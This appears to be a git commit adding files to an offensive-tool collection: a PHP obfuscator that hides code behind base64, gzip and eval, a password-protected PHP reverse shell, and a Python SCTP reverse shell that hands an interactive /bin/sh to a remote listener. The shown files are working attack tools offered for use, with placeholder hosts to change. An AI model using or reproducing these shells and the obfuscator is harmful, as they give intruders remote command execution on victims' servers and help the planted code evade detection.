update php

This commit is contained in:
tennc 2013-06-27 09:48:53 +08:00
parent 7fd6ddd078
commit 4ba14147b0
5 changed files with 4370 additions and 0 deletions

103
php/carbylamine.txt Normal file
View file

@ -0,0 +1,103 @@
<?php
function rstr() //Random String Function
{
$len=rand(3,6);
$chr='';
for($i=1;$i<=$len;$i++)
{
$chr.=rand(0,1) ? chr(rand(65,90)) : chr(rand(97,122));
}
return $chr;
}
function enjumble($data) //Custom Encoding + Base64 + gzinflate()
{
for($i=0;$i<strlen($data);$i++)
{
$data[$i]=chr(ord($data[$i])+1);
}
return base64_encode(gzdeflate($data,9));
}
function striptag($in) //Remove '<?php' from initial code
{
$pos = strpos($in,"<?php"); //to do: add support for short_tags
if(is_numeric($pos))
{
for($i=$pos;$i<=$pos+4 && strlen($in) >=5;$i++)
{
$in[$i]=' ';
}
return $in;
}
else
{
return $in;
}
}
function makeoutfile($str)
{ $funcname=rstr();
$varname='$'.rstr();
$template=
"<?php function ".$funcname."($varname)
{
$varname=gzinflate(base64_decode($varname));
for(\$i=0;\$i<strlen($varname);\$i++)
{
".$varname."[\$i] = chr(ord(".$varname."[\$i])-1);
}
return $varname;
}eval($funcname(\"";
$str=enjumble($str);
$template = $template . $str."\"));?>";
return $template;
}
function main($argc,$argv)
{
$banner=
"\n +-------------------------------------------------------------------+
|+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
|+ +|
+____ _ _ _ +|
/ __ \ | | | | (_) +|
| / \/ __ _ _ __ | |__ _ _ | | __ _ _ __ ___ _ _ __ _+|_
| | / _` || '__|| '_ \ | | | || | / _` || '_ ` _ \ | || '_ \ / _ \
| \__/\| (_| || | | |_) || |_| || || (_| || | | | | || || | | || __/
\____/ \__,_||_| |_.__/ \__, ||_| \__,_||_| |_| |_||_||_| |_| \___|
|+ __/ | +|
|+ Carbylamine PHP Encoder +|
|+ v0.1.1 Nightly +|
|+ +|
|+ +|
|+ Coded by Prakhar Prasad +|
|+ (prakharpd@gmail.com) +|
|+ +|
|+ +|
|+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
+-------------------------------------------------------------------+\n\n";
$usage="$banner Syntax: ".$_SERVER['PHP_SELF']." <file to encode> <output file>\n";
if($argc==1) {echo $usage ; die();}
if($argc>1) $file = $argv[1];
if($argc>2) $outfile = $argv[2];
if(empty($file) || empty($outfile)) { echo "Input/Output filename not entered!\n\n\x07" ;die();}
if(!file_exists($file))
{
echo "$banner Error: Input file doesn't exist\n\n\x07";
}
else{
$orginal_size=round(filesize($file)/1024,2);
echo "$banner Encoding : $file ($orginal_size KB) \n\n ";
$output_filename=$outfile;
$outfile=fopen($outfile,'w+');
$file=fread(fopen($file,'r'),filesize($file));
$outdata=makeoutfile(striptag($file));
$newsize=round(strlen($outdata)/1024,2);
echo " Compression : ".@round(100-(($newsize*100)/($orginal_size!=0?$orginal_size:1)),2)."%\n\n";
if(!fwrite($outfile,$outdata))
{
echo " Unable to write to $output_filename\n\n\x07";
}
else
{
echo " Successfully Encoded! to $output_filename\n\n" ;
}}}
main($argc,$argv);
?>

2347
php/indrajith-2.0.txt Normal file

File diff suppressed because it is too large Load diff

1782
php/indrajith.txt Normal file

File diff suppressed because it is too large Load diff

102
php/reverseshell-poc.txt Normal file
View file

@ -0,0 +1,102 @@
<?php
###################################################
# Reverse Shell v1.0 #
# Authentication Feature #
# #
# Hacksys Team - Panthera #
# Author: Ashfaq Ansari #
# hacksysteam@hotmail.com #
# http://hacksys.vfreaks.com #
# Designed for Linux #
# Thanks to lionaneesh #
# lionaneesh@gmail.com #
###################################################
ini_set('max_execution_time' ,0);
$VERSION = "1.0";
$ip = "127.0.0.1"; #Change this
$port = 4444; #Change this
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)
$banner = ("
_ _ _ _____
| | | | | | / ____|
| |__| | __ _ ___| | _| (___ _ _ ___
| __ |/ _` |/ __| |/ /\___ \| | | / __|
| | | | (_| | (__| < ____) | |_| \__ \
|_| |_|\__,_|\___|_|\_\_____/ \__, |___/
_______ __/ |
|__ __| |___/
| | ___ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Reverse Shell in PHP
Author: Ashfaq Ansari
hacksysteam@hotmail.com
http://hacksys.vfreaks.com/\n\n");
$pwd = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$id = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1' );
$date = shell_exec("date");
$len = 1337;
$info =
("
System Information:\n$sysinfo
Current Working Directory: $pwd
User Group: $id
Current Date and Time: $date\n
");
print "\nTrying to connect to: $ip on port $port ...\n\n";
$sockfd = fsockopen($ip , $port , $errno, $errstr );
if($errno != 0)
{
print "\n****** Error Occured ******\nError Nnumber: $errno\nError String: $errstr\n\n";
die(0);
}
else if (!$sockfd)
{
print "Fatal : An unexpected error was occured when trying to connect!\n";
}
else
{
print "Connected to: $ip on port $port ...\n\n";
fputs ($sockfd , $banner);
fputs($sockfd ,"Enter Password: ");
$getpass = trim(fgets($sockfd, strlen($password) + 2));
if ($getpass == $password)
{
fputs($sockfd, "\nAuthentication Successfull..\n");
fputs($sockfd, $info);
while(!feof($sockfd))
{
$cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
fputs ($sockfd , $cmdPrompt );
$command = trim(fgets($sockfd, $len));
if (trim($command) == "exit")
{
fputs($sockfd ,"\nAborted by user... Exiting..." );
fclose($sockfd);
die(0);
}
fputs($sockfd , "\n" . shell_exec($command) . "\n");
}
fclose($sockfd);
die(0);
}
else
{
fputs($sockfd ,"\nInvalid Password... Quitting...");
fclose($sockfd);
die(0);
}
}
?>

36
py/sctp_reverse.py.txt Normal file
View file

@ -0,0 +1,36 @@
#!/usr/bin/python
# SCTP Reverse Shell (TCP mode)
# Requires pysctp and sctp to be working
# on the victim box.
# My perfect saturday... Involves #
# infodox - Insecurety Research 2013
# insecurety.net | @info_dox
# I probably imported too much things. Who cares.
import socket
import _sctp
import sctp
from sctp import *
import os
import subprocess
host = '127.0.0.1' # CHANGEME
port = 1337 # CHANGEME
socket.setdefaulttimeout(60)
s = None
try:
s = sctpsocket_tcp(socket.AF_INET)
s.connect((host,port))
s.send('g0tsh3ll!\n')
save = [ os.dup(i) for i in range(0,3) ]
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
shell = subprocess.call(["/bin/sh","-i"])
[ os.dup2(save[i],i) for i in range(0,3)]
[ os.close(save[i]) for i in range(0,3)]
os.close(s.fileno())
except Exception:
print "Connection Failed! Is there even a listener?"
pass